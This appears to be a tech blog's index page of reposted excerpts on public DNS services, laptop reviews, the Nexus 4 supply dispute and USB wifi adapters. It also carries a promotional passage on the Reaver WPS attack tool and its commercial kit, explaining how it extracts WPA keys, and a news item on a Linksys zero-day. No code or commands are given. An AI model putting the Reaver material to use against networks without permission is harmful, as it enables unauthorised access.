UPDATE: Phil Sweeney from Whirlpool reminded me that using a third-party DNS service can also screw up your ISP's quota free downloads. For example, iiNet provides unmetered downloads from Apple's iTunes Store, which is great if you like to buy TV series and rent/buy movies on iTunes. However, if you change your DNS to OpenDNS or Google DNS, you'll be pulling the content from an Akamai server overseas, rather than the one in iiNet's network that is designated for free downloads. As a result, you will be charged for those downloads. - source

Read More

IdeaPad Yoga 13 Specs

Specification:

Description	Yoga 13
CPU	3rd generation Intel® Core™ i7-3517U 3rd generation Intel® Core™ i5-3317U 3rd generation Intel® Core™ i3-3217U
Operating System	Windows 8 Pro Windows 8
Memory	4GB, 8GB DDR3
Graphics	Intel® HD Graphics 4000 (integrated)
Dimensions	333.4 x 224.8 x 16.9 mm (13.1 x 8.9 x 0.67")
Camera	1.0MP 720p HD integrated webcam
Display	13.3" HD+IPS capacitive multitouch display (16:9 widescreen) (1600x900)
Weight	1.54 kg (3.4 lbs)
I/O Ports	1 USB 2.0 port 1 USB 3.0 port Combo jack HDMI 2-in-1 card reader (SD/MMC)
Storage	128GB SSD (256GB coming soon)
Wireless Connectivity	802.11 b/g/n wireless Bluetooth®
Keyboard	AccuType keyboard
Battery Life	8 hours
Security Features	OneKey® Recovery

Read More

Google Public DNS A Closer View

Earlier this month, Google announced that it had become the largest public DNS service in the world, handling an average of more than 70 billion requests a day. From Google’s point of view, this was great. As it pointed out in its official blog, a good DNS service helps make the Web faster and more secure. That’s true. But is a giant DNS in Google’s hands really good for the world?

The DNS or Domain Name System is often described as the “phone book” of the Internet, but that analogy tends to understate its importance. Imagine that you’ve suddenly landed in the middle of a giant megalopolis without any street names or building addresses or distinguishing characteristics and no working GPS. That would be the Internet without a domain name system.

But while the DNS system is criticial for planetary communications, helping to run it typically hasn’t brought anyone power or glory. This led to a certain amount of neglect, which in turn created a business opportunity for companies willing to tackle the job of improving DNS.

Three years ago, I sat down with David Ulevitch, a developer who founded OpenDNS in 2005 to help make the Internet faster and more reliable for individuals and businesses by providing a better domain name service. At the time, OpenDNS had built a small but profitable business providing improved DNS for free to individuals and for a fee to enterprises. It later grew to operate the largest network of public DNS servers, serving millions of users around the world.

Unlike Google, Ulevitch has never struck me as being obsessed with world domination, so I reached out to him this week to ask what he thought of Google’s entry, and now colossal presence, in the space.

What are the implications of Google being the largest public DNS service? Is this good for ordinary people who use the Internet?

First, I think it’s a clear indication that Google takes DNS seriously. I’ve always said that Google’s purview is limited to everything between the user and the advertisement. DNS fits squarely within those sights and cuts across a number of strategic areas of focus for Google—speed, security, analytics and control. I think efforts to make the Internet faster is good for ordinary people, but I think that there’s more to Google’s motives then pure benevolence. That’s not to say good can’t be a byproduct, but rather, there are ancillary benefits that may not be as friendly to the ordinary Internet user.

With DNS, it’s possible to control key components of Internet navigation. Google already controls search, they are quickly gaining market share to control the browser, and when you put in DNS, it becomes the trifecta of complete navigational control. The “omnibox” is something Google introduced with Chrome, but I actually introduced it to Google PM Sundar Pichai a number of years before Chrome existed when demoing our vision for OpenDNS to him as he was then the PM for Google Toolbar, and other Google desktop products.

What role has Google played in the DNS ecosystem? Do you see them as a competitor or a partner?

Google has helped raise the importance of DNS above the network engineering community, which has been really good. They’ve also worked with us to advance the state of the art for DNS performance, something we’ve really enjoyed working with them to make happen. It’s not so much competition as it is choice in the market. If they started defaulting Chrome to use Google DNS, I think that’s something we would take issue with, but for now, we like the idea of people using a DNS other than their ISPs, that’s a good idea for a lot of reasons.

What are some of those reasons?

I like the idea of separation of services. ISPs provide a pipe. Other vendors provide security. Other vendors provide email. When one party controls all the services, it’s a “synergy” for the company, but rarely for the consumer. With DNS in particular, there are performance and security benefits that third party DNS providers offer that ISPs aren’t incentivized to do since DNS is a cost-center for them, and a profit-center for us.

Are there any privacy concerns to think about if you configure your network settings to use Google Public DNS?

You are trusting them with all your DNS lookup data, which can be more personal and revealing than I think most people realize. We don’t persist logs for our users without accounts and configured networks, I’m not sure Google makes the same statement. They have a separate privacy policy for Google DNS, and I’m sure they are hypersensitive about privacy concerns, so I wouldn’t be too paranoid.

If an ordinary person using the Web doesn’t make this change, would they have any exposure to Google Public DNS?

Probably not. OpenDNS is in 10′s of 1000′s of public hotspots, retail stores, schools, and businesses. so people often find our service. I’m not sure about Google DNS in that capacity.

If Google is the largest public DNS, who is the largest private DNS?

An ISP—maybe Comcast? I’m not sure. Google claims the most number of queries per day, but we actively discourage automated usage of OpenDNS by machines, crawlers and other software. Google doesn’t. I’m not sure they have more end users than we have. We are still growing at an aggressive clip.

Anonymous has publicly posted its threat to take down the Internet on March 31 by attacking the 13 DNS root servers of the Internet. Do you take this threat seriously?

Anonymous is nothing and everything at the same time. While I think it’d be very difficult to take down the root servers on the Internet, I think it’s entirely possible to cause massive disruption to the Internet in other ways if someone was focused on doing that. The Internet is always getting more secure, and more diversely connected, but there are some weak links still where a specific outage in a specific place would have far-reaching disruptive implications.

Does the presence of players like OpenDNS and Google Public DNS make the Internet more stable?

I think anything which promotes heterogeneity on the Internet promotes stability. Diversity in services, service providers, and separating the layers of the networking stack are all important. Your ISP no longer provides you email because everyone either uses their own or has an account with Hotmail, Gmail or Yahoo mail. The same way people unbundled their email from their ISP, I think they should do with their DNS. Separation of services has been a long-standing best practice in the security community, and it applies now more than ever. In that vein, I’ll reiterate my view that I think Google controlling search, the browser, and the network or DNS layer is a dangerous trifecta that the consumer will probably be best served avoiding. I’m sure we’ll find out soon enough. - source

Read More

LG: Google Nexus 4 at $200 Limited Supply

Google made a bold move late last year by announcing its flagship Nexus smartphone for an unsubsidized price starting at $300. That's a big deal when comparable devices are selling for twice as much and the upfront cost for most last generation phones with a two year contract is only slightly cheaper at $200. But ultimately Google failed to deliver -- both figuratively and literally -- as it missed shipping deadlines and had to pull the device from sale due to problems with supplies.

Last month, the company pinned the blame on "scarce and erratic" supplies from manufacturer LG, while also admitting that their communication had been flawed.

But LG has a different story to tell. In an interview with French website Challenges, Cathy Robin, director LG Mobile France said they built precisely the number of phones that Google requested, it's just that the Internet giant's sales forecasts were wildly inaccurate. Estimates were based on sales of the Samsung-made Galaxy Nexus, which meant there were too few handsets available and too many shipped to the wrong regions.

Robin noted that despite the setbacks, the partnership between Google and LG is still going well, and in fact they expect to ramp up production of the Nexus 4 by mid-February to address the shortage.

Last week, LG's senior vice president James Fisher also said that the Nexus 4 was "the first of many" products the Korean firm had planned with Google, sparking rumors that the firm could be in charge of its successor. - source

Read More

Lenovo ThinkPad X230 Review

September 19, 2012: The ThinkPad is to personal computing what polka dots are to fashion – it’s a classic. Originally an IBM product, and taken over by Lenovo about seven years ago, the concept and construct of a ThinkPad has changed little over the years. The Japanese Bento-box inspired design remains largely unchanged with tweaks made only to improve ergonomics or adapt to new screen sizes.

Design details

We got our hands on one of the new-age ThinkPads, the Lenovo X230. While retaining its executive-like all-black look, this ThinkPad is designed to be lightweight and compact to meet the needs of an increasingly mobile lifestyle.

In a market where thinner is apparently better, the 1-inch plus girth of the Lenovo X230 seems like an aberration. However, Lenovo manages to pack all of it in about 1.5 kgs, an easily portable bulk. The build quality is sturdy with a magnesium roll cage housing the tech inside and a soft rubberised panel on the body which keeps scratches away.

The 12.5-inch screen is an IPS display, which means readability/visibility was excellent at all times. The viewing angles too were better than the usual fare. We watched ‘Before Sunrise’, the 1995 romantic classic and although we had to use it with external speakers, the video experience was quite good.

The creators of the ThinkPad, and the engineers who have carried the company’s legacy on, have always paid an uncommon amount of attention to the device’s keypad. Although it’s one of the most used components of any personal computing device, users seldom prioritise a genuinely ergonomic keypad over more aesthetic features when going for a laptop. However, for someone who hasn’t used a ThinkPad keyboard before, the typing hardware is quite a pleasant revelation. The island – type keyboard seems to have been spaced at just the right distance, with the keyboard depressed just a little bit so your finger’s natural curve find the right fit every time you hit a key.

The space bar also doubled up as a function key for an overhead lamp that highlights the keyboard. A simple addition but extremely useful considering how many times we fumble around in the dark when trying to tweak volume or pause in the middle of a movie we might be watching before going off to bed.

Targeted at the business traveller, the X230 has been made ready for video and voice conferencing with a dual-array noise cancelling microphone that keeps ambient noise at a minimum. During conference calls or video chats, you can even choose to mute the sound of keys being typed on your keyboard for a clearer conversation. The webcam is a high-definition 720p HD camera which has face tracking enabled.

A device which aimed at the business traveller needs to be equipped with the latest connectivity options. The ThinkPad X230 hence comes with three USB ports (2 x USB 3.0), a memory card reader, Gigabit Ethernet port, VGA and Mini DisplayPort outputs and an Express Card slot.

Multimedia

The ThinkPad X230 is equipped with Dolby speakers with Advanced Audio v2. However, the audio experience on the laptop was definitely not one of the best we’ve come across. Most times the volume on the speakers was too feeble and the audio had little impact. Hence, we inevitably had to plug in the headphones while watching a movie or sitcom.

Our ThinkPad X230 review unit operates on Microsoft Windows 7 Professional and is powered by an Intel Core i5 3210M with an over clocking speed of 2.5GHz.

We ran our regular Novabench test on the Lenovo X230 and it scored about 676 points shooting way ahead of a bunch of Ultrabooks and laptops we had reviewed in the last couple of months, including the Dell Inspiron 17R Special Edition and the Acer Aspire TimelineUltra M5; the only exception being the Dell XPS 14z which we reviewed earlier this year.

Like most other manufacturers there’s a bit of bloatware that comes with Lenovo ThinkPad X230, the only good thing is you might actually be able to use this software regularly. You’ll find programs such as Evernote, Google Chrome, Skype etc on board already. With the screen dimmed and constant Wi-Fi connectivity the Lenovo ThinkPad X230 gave us close to six hours of email and media usage.

Crafted as a modern, compact device to be carried along for presentations or business trips, the Lenovo ThinkPad X230 does the job efficiently. For those who might want to replace say an older version of a ThinkPad, the X230 is a decent option, unless you are saving up for slimmer devices such as the Carbon X1. For those who are considering buying their first ThinkPad, the X230 competes well when it comes to productivity with its competitors in the market. - source

Read More

LaVie World’s Lightest Ultrabook

How light would you like your Ultrabook? If even 3 pounds seems to heavy to you, try packing the 13.3-inch NEC LaVie Z, which weighs a paper-light 1.9 pounds. We had a chance to go hands-on with the svelte system here at Intel’s Developer Forum and we just couldn’t believe how light it felt in our hands.

At just .59-inches thick, the LaVie Z is also one of the thinnest notebooks on the market. Despite the thinness, we were pleased to see that the Ultrabook, which is made from a lightweight lithium-magnesium alloy, has room for several ports including an SD card reader, two USB ports (one of which is USB 3.0) and a full-size HDMI port. We wish there was an Ethernet port, but you can’t have everything on a system this light.

The 13.3-inch screen touts a respectable resolution of 1600 x 900 which, in our brief hands-on, made images fairly sharp, but colors were not particularly vibrant and the viewing angles on this glossy screen seemed poor as a lot of light reflect off its surface. Even at maximum brightness, the display did not seem particularly bright to us, but to be fair, the notebook was on display in an area of the convention center with a lot of sunlight coming in and hitting its surface.

The LaVie Z’s keyboard has some awkward key sizes and placements, with a tiny undersized right Shift key that sits to the right of the up arrow key, a giant rectangular Enter key that looks like it belongs on an old-school typewriter and a tiny square backspace key. When we pressed the keys they seemed a bit shallow but not overly stiff or mushy. The small, matte touch pad appeared reasonably accurate in our use.

However, the most impressive feature of the NEC LaVie Z is clearly its lightweight chassis. While we normally have difficulty holding a notebook by its deck with just one hand, we were able to hold up the LaVie Z with our left, non-dominant hand while filming with our right. Better still, the Ultrabook did not feel creaky or loosely constructed even when we held it this way.

Though it is made for the Japanese market where it was released in August, Dynamism is now selling the LaVie Z to U.S. consumers for $1,799 with a 1.9-GHz Intel 3rd Generation Core i7 CPU, 4GB of RAM and a 256GB SSD. - source

Read More

Reaver Pro Tool Kit

Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.

WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.

Current attacks against WPA networks involve the computation of rainbow tables based on a dictionary of potential keys and the name (SSID) of the network being attacked. Rainbow tables must be re-generated for each network encountered and are only successful if the PSK is a dictionary word. However, Reaver is not restricted by the limitations of traditional dictionary-based attacks. Reaver is able to extract the WPA PSK from the access point within 4 - 10 hours and roughly 95% of modern consumer-grade access points ship with WPS enabled by default.

Get Reaver Pro

You can find the free, open source version of Reaver at Google Code

Tactical Network Solutions is now pleased to offer a commercial version of Reaver called Reaver Pro. Reaver Pro is a dedicated hardware kit that allows operators to effortlessly conduct WPS attacks via a graphcial web interface. The hardware is preconfigured and tested for field use, operators only have to plug it and start the attack. Simply connect the bootable USB and provided wireless card into a laptop and boot to the Reaver Pro distribution. Browse to the localhost in a web browser, and select the network you want to attack, it's that easy!

The Reaver Pro kit comes with:

• Tactical Network Solutions USB drive with bootable Reaver Pro distribution
• Tactical Network Solutions USB radio
• Reaver Pro Users Guide (8 pages)
• High gain 5dBi Antenna
• Micro USB Cable

Via Reaver Pro

Read More

Linksys routers vulnerable to zero-day exploit

A zero-day vulnerability has been discovered in popular Cisco Linksys routers that allows hackers to gain remote root access. Security vendor DefenseCode discovered the flaw and reported it to Cisco months ago and a fix is already on the way.

According to Cisco, more than 70 million Linksys routers sold globally. This exploit was successfully tested against a Linksys model WRT54GL router by researchers at security firm DefenseCode who claimed that the latest Linksys firmware 4.30.14 and all previous versions are still vulnerable.

It took the team only 12 days to develop an exploit that could be used by hackers to take control of a person’s wireless router and hijack all the information being processed through it.

The vulnerability is demonstrated in the following video:

Read More

Chic Blogger of the Week

Today I just wanted to features this chic her name is Dovy whom I stumble upon at bloggers.com she looks so cool. The simple girl but sexy and gorgeous, unfortunately she is in Melaka at that time while I was in Port Dickson. Untimely, I am in Langkawi soon she is heading to Pangkor Island. Wish to meet her soon at KLCC. lol!

Read More

Netsys 980000N 150Mbps USB Dual Antenna

The Netsys 980000N is base on Ralink RT3070 chipset, a USB 2.0 backward compatible compliant to USB 1.1. It is equip with two 9dBi detachcable RP-SMA twin antenna claiming to have 4200 milliwatt power output. It is a traditional draft 802.11n that support also b/g.

Specifications:

• Model: Netsys 980000N
• Power: 4200mW
• Chipset: Ralink RT3070
• Security: WEP 64/128, WPA, WPA-PSK, WPA II
• USB 2.0/1.1 compliant
• Frequency range: 2.4~2.4835GHz
• Dual 9dBi antenna
• Sensitivity: -65dBm at 130Mbps/-74dBm at 54Mbps/-84dBm at 11Mbps
• Modulation: OFDM/CCK/BPSK/QPSK
• Antenna type: 2 x RP-SMA connector
• Supports Windows 7/2000/XP/Vista/Linux/Mac OS
• Package includes:
• 1 x Network adapter
• 1 x USB cable
• 1 x Software CD
• 1 x Chinese manual

Read More

CD-R King CW300UB 300Mbps USB Dual Antenna

The CD-R King CW300UB is 300Mbps 802.11n/b/g USB wireless dual antenna. Actually it is just a clone of Comfast, Edup, Kinamax and others which is being repainted according to brand name. It is identical to the above mention if you take a look the specification including the casing and so on, except the name which is CD-R King here in the Philippines.

Specifications:

• CPU: Ralink RT3072
• Standard: IEEE802.11b, IEEE802.11g, IEEE802.11n(2.0), IEEE802.11e (WMM), I, f and h standards, IEE802.1x
• Physical Interface: USB 1.1 / 2.0
• Operating Voltage: 5V
• Antenna: SMA2dBi antenna (2T2R)
• LED Status: Link Activity & PWR
• Frequency Band: 2.400-2.484GHz
• Modulation Technology: OFDM: BPSK: QPSK, 16-QAM, 64-QAM, DBPSK, DQPSK, CCK

Receive Sensitivity

• 2.412-2.472G(IEEE802.11b): Optimal -90dBm @ 1Mbps
• 2.412-2.472G(IEEE802.11g): Optimal -89dBm
• 2.412-2.472G(IEEE802.11N):Optimal -89dBm

Transmit Power

• 2.412-2.472G(IEEE802.11b): Up to 20dBm
• 2.412-2.472G(IEEE802.11g): Up to 15dBm
• 2.412-2.472G(IEEE802.11N): Up to 15dBm
• Support WEP, WPA/ WPA2 (AES /TKIP), WPS, WMM
• Support any common operating system including the Windows 2000/ XP/ VISTA / CE/ 7/ MAC/ LINUX

Read More